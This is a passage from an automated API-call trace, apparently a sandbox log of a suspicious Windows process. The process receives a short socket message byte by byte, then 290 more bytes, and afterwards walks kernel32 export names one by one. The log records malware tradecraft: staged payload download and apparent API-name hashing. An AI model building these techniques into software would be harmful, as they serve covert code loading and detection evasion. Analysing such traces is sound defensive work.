(in: s=0x21c, buf=0x31cf3a7, len=1, flags=0 | out: buf=0x31cf3a7*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a8, len=1, flags=0 | out: buf=0x31cf3a8*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3a9, len=1, flags=0 | out: buf=0x31cf3a9*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3aa, len=1, flags=0 | out: buf=0x31cf3aa*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3ab, len=1, flags=0 | out: buf=0x31cf3ab*) returned 1 [0178.923] recv (in: s=0x21c, buf=0x31cf3ac, len=1, flags=0 | out: buf=0x31cf3ac*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3ad, len=1, flags=0 | out: buf=0x31cf3ad*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3ae, len=1, flags=0 | out: buf=0x31cf3ae*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3af, len=1, flags=0 | out: buf=0x31cf3af*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b0, len=1, flags=0 | out: buf=0x31cf3b0*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b1, len=1, flags=0 | out: buf=0x31cf3b1*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b2, len=1, flags=0 | out: buf=0x31cf3b2*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b3, len=1, flags=0 | out: buf=0x31cf3b3*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b4, len=1, flags=0 | out: buf=0x31cf3b4*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b5, len=1, flags=0 | out: buf=0x31cf3b5*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b6, len=1, flags=0 | out: buf=0x31cf3b6*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b7, len=1, flags=0 | out: buf=0x31cf3b7*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b8, len=1, flags=0 | out: buf=0x31cf3b8*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3b9, len=1, flags=0 | out: buf=0x31cf3b9*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3ba, len=1, flags=0 | out: buf=0x31cf3ba*) returned 1 [0178.924] recv (in: s=0x21c, buf=0x31cf3bb, len=1, flags=0 | out: buf=0x31cf3bb*) returned 1 [0178.925] recv (in: s=0x21c, buf=0x31cf3bc, len=1, flags=0 | out: buf=0x31cf3bc*) returned 1 [0178.925] recv (in: s=0x21c, buf=0x31cf3bd, len=1, flags=0 | out: buf=0x31cf3bd*) returned 1 [0178.925] recv (in: s=0x21c, buf=0x31cf3be, len=1, flags=0 | out: buf=0x31cf3be*) returned 1 [0178.925] recv (in: s=0x21c, buf=0x31cf3bf, len=1, flags=0 | out: buf=0x31cf3bf*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c0, len=1, flags=0 | out: buf=0x31cf3c0*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c1, len=1, flags=0 | out: buf=0x31cf3c1*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c2, len=1, flags=0 | out: buf=0x31cf3c2*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c3, len=1, flags=0 | out: buf=0x31cf3c3*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c4, len=1, flags=0 | out: buf=0x31cf3c4*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c5, len=1, flags=0 | out: buf=0x31cf3c5*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c6, len=1, flags=0 | out: buf=0x31cf3c6*) returned 1 [0178.928] recv (in: s=0x21c, buf=0x31cf3c7, len=1, flags=0 | out: buf=0x31cf3c7*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3c8, len=1, flags=0 | out: buf=0x31cf3c8*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3c9, len=1, flags=0 | out: buf=0x31cf3c9*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3ca, len=1, flags=0 | out: buf=0x31cf3ca*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3cb, len=1, flags=0 | out: buf=0x31cf3cb*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3cc, len=1, flags=0 | out: buf=0x31cf3cc*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3cd, len=1, flags=0 | out: buf=0x31cf3cd*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3ce, len=1, flags=0 | out: buf=0x31cf3ce*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3cf, len=1, flags=0 | out: buf=0x31cf3cf*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d0, len=1, flags=0 | out: buf=0x31cf3d0*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d1, len=1, flags=0 | out: buf=0x31cf3d1*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d2, len=1, flags=0 | out: buf=0x31cf3d2*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d3, len=1, flags=0 | out: buf=0x31cf3d3*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d4, len=1, flags=0 | out: buf=0x31cf3d4*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d5, len=1, flags=0 | out: buf=0x31cf3d5*) returned 1 [0178.929] recv (in: s=0x21c, buf=0x31cf3d6, len=1, flags=0 | out: buf=0x31cf3d6*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3d7, len=1, flags=0 | out: buf=0x31cf3d7*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3d8, len=1, flags=0 | out: buf=0x31cf3d8*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3d9, len=1, flags=0 | out: buf=0x31cf3d9*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3da, len=1, flags=0 | out: buf=0x31cf3da*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3db, len=1, flags=0 | out: buf=0x31cf3db*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3dc, len=1, flags=0 | out: buf=0x31cf3dc*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3dd, len=1, flags=0 | out: buf=0x31cf3dd*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3de, len=1, flags=0 | out: buf=0x31cf3de*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3df, len=1, flags=0 | out: buf=0x31cf3df*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3e0, len=1, flags=0 | out: buf=0x31cf3e0*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3e1, len=1, flags=0 | out: buf=0x31cf3e1*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3e2, len=1, flags=0 | out: buf=0x31cf3e2*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3e3, len=1, flags=0 | out: buf=0x31cf3e3*) returned 1 [0178.930] recv (in: s=0x21c, buf=0x31cf3e4, len=1, flags=0 | out: buf=0x31cf3e4*) returned 1 [0178.931] StrToIntA (lpSrc="290") returned 290 [0178.931] VirtualAlloc (lpAddress=0x0, dwSize=0x122, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0178.931] recv (in: s=0x21c, buf=0x6a0000, len=290, flags=0 | out: buf=0x6a0000*) returned 290 [0178.931] VirtualFree (lpAddress=0x630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.931] VirtualFree (lpAddress=0x640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.931] VirtualFree (lpAddress=0x650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.932] closesocket (s=0x21c) returned 0 [0178.932] WSACleanup () returned 0 [0178.960] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.964] VirtualFree (lpAddress=0x620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.969] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.973] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.981] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.981] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.981] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.981] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0178.981] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0178.982] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0178.982] GetTickCount () returned 0x1134319 [0178.982] GetTickCount () returned 0x1134319 [0178.982] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0178.982] lstrlenA (lpString="kernel32.dll") returned 12 [0178.982] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.982] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.982] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.982] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.982] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.982] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.982] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.982] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.983] lstrlenA (lpString="ADDATOMA") returned 8 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.983] lstrlenA (lpString="ADDATOMW") returned 8 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.983] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.983] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.983] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.983] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.983] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.983] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.983] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.983] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.983] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.983] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.983] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.983] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.983] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.983] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.983] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.983] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.984] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.984] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.984] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.984] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.984] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.984] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.984] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.984] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.984] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.984] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.984] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.984] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.984] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.984] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.984] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.984] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.984] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.984] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.984] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.985] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.985] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.985] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.985] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.985] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.985] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.985] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.985] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.985] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.985] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.985] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.985] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.985] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.985] lstrlenA (lpString="BEEP") returned 4 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.985] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.985] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.985] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.985] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.985] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.986] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.986] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.986] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.986] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.986] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.986] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.986] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.986] lstrlenA (lpString="CANCELIO") returned 8 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.986] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.986] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.986] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.986] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.986] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.986] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.986] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.986] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.986] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.986] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.986] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.986] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.987] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.987] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.987] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.987] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.987] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.987] 